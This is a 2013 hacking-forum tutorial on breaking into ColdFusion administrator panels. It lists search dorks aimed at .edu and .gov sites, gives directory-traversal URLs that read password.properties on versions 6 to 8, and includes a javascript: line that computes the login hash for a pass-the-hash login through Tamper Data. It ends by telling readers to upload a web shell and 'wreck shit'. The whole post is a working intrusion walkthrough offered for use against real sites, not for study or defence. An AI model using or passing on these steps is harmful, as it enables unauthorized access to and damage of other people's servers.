How to hack cold fusion 06-15-2013, 01:47 AM
#1
What is ColdFusion
What you will need.
This method is basically an LFI/RFI attack.
The tutorial
First we will want to find a vulnerable site, use these dorks.
Once you have found a vulnerable site, see if you can access the admin panel.
If you get a error or the version is above 9 find another site.
If the site is version 6 it will be like this.
If the site is version 7 it will be like this.
If the site is version 8 it will be like this.
Now there should be a hash on the webpage, that is the password.
You only have a 30 second window to complete this step.
Run this script in the address bar.
An alert should pop up with the hash, copy it.
Now go to tamper data, and start tampering.
Choose the login form, and paste the hash into the password field.
Click OK.
Now you should be in the admin panel of the website, upload the shell I have provided and then you're free to wreck shit, like we do here at Sinister.ly
I hope you find this tutorial useful.
Quote:ColdFusion is a commercial rapid web application development platform invented by Jeremy and JJ Allaire in 1995. (The programming language used with that platform is also commonly called ColdFusion, though is more accurately known as CFML.) ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By Version 2 (1996), it had become a full platform that included an IDE in addition to a "full" scripting language. As of 2010, versions of ColdFusion (purchased by Adobe Systems in 2005) include advanced features for enterprise integration and development of rich Internet applications.More can be read here.
What you will need.
- Tamper Data.
- .CFM shell.
- A proxy or VPN.
- Patience
This method is basically an LFI/RFI attack.
The tutorial
First we will want to find a vulnerable site, use these dorks.
Code:
inurl:cfm
inurl:cfm inurl:edu
inurl:cfm inurl:govOnce you have found a vulnerable site, see if you can access the admin panel.
Code:
http://youwontfindanythinghereshithead.com/CFIDE/administrator/enter.cfmIf the site is version 6 it will be like this.
Code:
http://youwontfindanythinghereshithead.com/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00enIf the site is version 7 it will be like this.
Code:
http://youwontfindanythinghereshithead.com/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00enIf the site is version 8 it will be like this.
Code:
http://youwontfindanythinghereshithead.com/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00enNow there should be a hash on the webpage, that is the password.
You only have a 30 second window to complete this step.
Run this script in the address bar.
Code:
javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))An alert should pop up with the hash, copy it.
Now go to tamper data, and start tampering.
Choose the login form, and paste the hash into the password field.
Click OK.
Now you should be in the admin panel of the website, upload the shell I have provided and then you're free to wreck shit, like we do here at Sinister.ly
I hope you find this tutorial useful.
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: 8536321abf.jpg]](http://puu.sh/kt29S/8536321abf.jpg)
Me and Lux are the realest users here.
![[Image: F4Z9Dqw.png]](https://i.imgur.com/F4Z9Dqw.png)
![[Image: BAvhP6h.png]](http://i.imgur.com/BAvhP6h.png)
